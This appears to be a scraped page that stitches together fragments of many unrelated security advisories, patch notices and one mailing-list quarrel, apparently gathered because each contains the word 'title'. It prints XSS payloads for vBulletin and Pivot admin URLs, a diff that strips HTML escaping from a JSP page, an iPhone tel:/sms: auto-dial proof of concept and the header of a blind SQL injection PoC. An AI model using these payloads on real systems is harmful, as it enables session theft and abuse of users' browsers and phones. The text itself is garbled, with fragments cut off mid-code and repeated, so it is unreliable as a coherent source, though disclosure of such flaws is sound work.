Next Page >>
title
-:: The Advisory ::-
The header.php file for showing a single microblog entry does not sanitize the page_title correct.
page_title is set by the user when posting an entry to the microblog platform.
Original Post at http://forum.aria-security.com/en/showthread.php?p=1179
Greetz to Aura & all Aria-Security Mods & Members
These were all tested on vbulletin 3.8.0 RC2 so other version may be effected.
1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
or any other XSS code.
2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif. use the following code as title name.
%>
<head>
<meta http-equiv="content-type" content="text/html;
charset=iso-8859-1"/>
@@ -45,7 +47,7 @@
<title>Sessions Administration: details for <%= currentSessionId
%></title>
</head>
<body>
- -<h1>Details for Session <%= JspHelper.escapeXml(currentSessionId) %></h1>
+<h1>Details for Session <%= currentSessionId %></h1>
<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.7.2" -->
<?xml-stylesheet href="http://www.w3.org/2000/08/w3c-synd/style.css" type="text/css"?>
<rss version="0.91">
<channel>
<title> Feed</title>
<description></description>
<link>http://192.168.0.1</link>
<lastBuildDate>Sat, 09 May 2009 20:01:44 +0100</lastBuildDate>
<generator>FeedCreator 1.7.2</generator>
<language>en-us</language>
RESOLUTION
HP had provided the following patches to resolve the vulnerability. The patch kits can be downloaded from http://support.openview.hp.com/selfsolve/patches by searching for product 'HP TestDirector for Quality Center', Product version 9.2 and Optional keyword 'Patch8'.
Title: Monthly patch8 - TD4QC_00033
Document ID: KM425256
Product: TestDirector for Quality Center Version: 9.2
OS: AIX
Title: Monthly patch8 - TD4QC_00034
The individual items of an RSS channel are handled in
html/webmail/server/inc/rss/item.php
In the function getHTML(), the final HTML page for an item is assembled
and returned. The "title" and "description" keys correspond to the
<title> and <description> elements in the feed, the "href" key to the
<link> element:
------------------------------------------------------------------------
159 public function getHTML(&$aItem)
switch($searchby){
........
case "Title" :
$title = $_POST['searchquery'];
if(strlen($title)>2){
//check length at least 3 chars
#------------
#CONDITIONS:
#------------
#
#
#**Exist a valid image with title
#
#**gpc_magic_quotes=off/on
#
#---------------------------------------
#PROOF OF CONCEPT (BLIND SQL INJECTION):
Copy and save --> PoC.html.
Configure --> HOST, HOME_PATH
<html>
<title>
PoC BY Y3NH4CK3R --PROUD TO BE SPANISH-->
</title>
<h1>
Click "Execute PoC" to launch the proof of concept (SQLi)...
</h1>
Copy and save --> PoC.html.
Configure --> HOST, HOME_PATH
<html>
<title>
PoC BY Y3NH4CK3R --PROUD TO BE SPANISH-->
</title>
<h1>
Click "Execute PoC" to launch the proof of concept (SQLi)...
</h1>
Then again you seem to be judging about something you haven't seen
nor read. Is this because I ask the Fox News style questions and you
give Fox News style comments ?
FFL> the title is misleading at best.
While I have the upmost respect of your person, in this particular
case, I am sorry dude, but how can you tell ? Have you seen the
presentation? Have you heard the conclusion? I don't think so?
Though you are more than welcome to see it :)
Application insufficiently verifies description incoming parameter in /staff/index.php?_m=troubleshooter&_a=insertcategory script.
An attacker with "staff" privileges can use the vulnerabilty to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
To use the vulnerability an attacker should convince a user with "staff" privileges to open URL like:
http://example.com/support/staff/index.php?_m=troubleshooter&_a=managecategories
to exploit the vulnerability.
Application insufficiently verifies title incoming parameter in /staff/index.php?_m=downloads&_a=insertfile script.
An attacker with "staff" privileges can use the vulnerabilty to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
An attacker should trick a user with "staff" privileges to open URL like:
http://example.com/support/staff/index.php?_m=downloads&_a=managefiles
to exploit the vulnerability.
Title:
======
osCmax Shop CMS v2.5.1 - Multiple Web Vulnerabilities
Date:
=====
2012-04-08
Title:
======
GroupWare epesiBIM CRM 1.2.1 - Multiple Web Vulnerabilities
Date:
=====
2012-04-10
community of users to easily publish, manage and organize a wide
variety of content on a website. (From: http://drupal.org/about)
The Node Blocks module allows users to specify content type(s) as
being a block. This allows the content managers of the site to edit
the block text and title without having to access the block
administration page. (From: http://drupal.org/project/nodeblock)
The block title is not properly sanitized when a user displays a block
created from a node, resulting in a cross site scripting
vulnerability.
/opencms/opencms/system/workplace/commons/publishproject.jsp
Remediation: Filter out hazardous characters from user input
Parameter(s): title, cancel, dialogtype, framename, progresskey,
projected, projectname, publishsiblings, relatedresources, subresources
Vulnerability(s): Cross-Site Scripting, Phishing Through Frames, SQL
Injection
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) 18 May 2010 Initial release
Version:2 (rev.2) 28 May 2010 Updated title, affected software description and summary
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Proof-of-Concept with plain HTML using the SMS application:
<html>
<head>
<title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
</title>
</head>
<body>
<iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
<iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
attachments are also saved locally. The file names used to save the
attachments are obtained from the TNEF data. In case of normal
attachments, the code first looks if the TNEF data contains MAPI
properties and if so, it will look for specific properties. If these
exists, a file name is extracted from these properties. If the
properties do not exist, the attachment's title is used. This title
is also set through a TNEF structure. If this title is also not
available, a default file name will be used instead.
if ((RealAttachment == 1) || (saveintermediate == 1)) {
/* Ok, it's not an embedded stream, so now we */
>
>Proof-of-Concept with plain HTML using the SMS application:
>
> <html>
> <head>
> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> </title>
> </head>
> <body>
> <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>> <html>
>> <head>
>> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>> </title>
>> </head>
>> <body>
>> <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>> <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>>
>>> Proof-of-Concept with plain HTML using the SMS application:
>>>
>>> <html>
>>> <head>
>>> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>> </title>
>>> </head>
>>> <body>
>>> <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>> <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
Cross Site Scripting: (triggers on logged in administrators only) [low
or no impact due to session-key in url]
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=entries&sort="><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=entries&doaction=1&action=delete&check[]='><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=entries&doaction=1&action=delete&check['><script>alert(0)</script>]=0
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=admin&do=edituser&edituser=</title><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=admin&do=templates&edit=<script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=admin&do=blog_edit1&blog="><script>alert(0)</script>
http://[HOST]/pivot/pivot/index.php?session=VALIDSESSION&menu=admin&func=admin&do=cat_edit&cat="><script>alert(0)</script>
retrieve nearly arbitrary files from the filesystem. The relevant source code
for these pages is as follows:
// The following is Copyright (C) 2009 TANDBERG //
...
// Grab the content before we write anything: we'll need it for the title tag in the <head>
// Dig out the page title, from the <title> tag,
// then remove any surround in the page as we add our own...
$filename = $this->helpPagePath . $_GET['page'] . $this->helpPageSuffix;
if (! file_exists($filename)) {
Url_PrefixUnInstall /logs
Note: For further information please refer to the following document.
Document title: CAE Alert: Unauthenticated access to HPCA log files from a web browser
Document ID: KM897874
The document is available from the HP Software Support Online portal at http://support.openview.hp.com/
PRODUCT SPECIFIC INFORMATION
Software: Samizdat, an open publishing web application written in Ruby
Vulnerability: cross-site scripting
Vulnerable Versions: 0.6.1 and earlier
Non-vulnerable Versions: 0.6.2, Debian package 0.6.1-3lenny1
Patch: http://samizdat.nongnu.org/release-notes/samizdat-0.6.1-xss-escape-title.patch
References: CVS-2009-0359, DTSA-194-1
Description:
Samizdat 0.6.1 contains several code paths that fail to escape special HTML
'month1' => TYPE_INT,
'day1' => TYPE_INT,
'month2' => TYPE_INT,
'day2' => TYPE_INT,
'period' => TYPE_INT,
'title' => TYPE_STR,
'description' => TYPE_STR,
));
..
$db->query_write("
UPDATE " . TABLE_PREFIX . "holiday
PRODUCT SPECIFIC INFORMATION
None
HISTORY
Version:1 (rev.1) - 18 August 2008 Initial release
Version:2 (rev.2) - 18 August 2008 Correction to numbers in title
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
vBulletin Cross Site Scripting Vulnerability
*Advisory Information*
Title: vBulletin Cross Site Scripting Vulnerability
Advisory ID: CORE-2008-0813
Advisory URL: http://www.coresecurity.com/my-advisory
Date published: 2008-08-20
Date of last update: 2008-08-19
Vendors contacted: vBulletin team
########################## www.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: Pluck Local File inclusion
# Vendor: http://www.pluck-cms.org
# Bug: Local File Inclusion
# Vulnerable Version: 4.5.1 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix: N/A
Next Page>>
|
